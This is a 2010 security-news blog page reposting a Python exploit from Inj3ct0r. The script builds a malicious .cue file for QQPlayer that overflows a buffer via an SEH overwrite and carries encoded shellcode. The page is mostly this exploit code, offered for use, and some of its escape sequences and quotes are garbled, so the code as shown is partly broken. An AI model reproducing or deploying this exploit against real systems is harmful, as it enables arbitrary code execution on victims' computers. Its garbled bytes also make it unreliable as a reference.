QQPlayer cue File Buffer Overflow Exploit

Jul.21, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>QQPlayer cue File Buffer Overflow Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
QQPlayer cue File Buffer Overflow Exploit
=========================================

#!/usr/bin/env python

#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :

head = ”’FILE "”’
junk = "A" * 780
nseh ="x42×61x21×61"
seh ="xa9×9ex41×00"
adjust="x32×42x61×33xcax83xc0×10"
shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
"0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
"H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
"NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_="R"*8000
foot =”’.avi" VIDEO”’+"x0a"”’TRACK 02 MODE1/8888”’+"x0a"+"INDEX 08 08:08:08"
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open("poc.cue","w")
fobj.write(payload)
fobj.close()

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-21]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/5938

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

M	T	W	T	F	S	S
« Jun				Aug »
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

QQPlayer cue File Buffer Overflow Exploit

Leave a Reply

Quote

Categories

Calendar

Recent Posts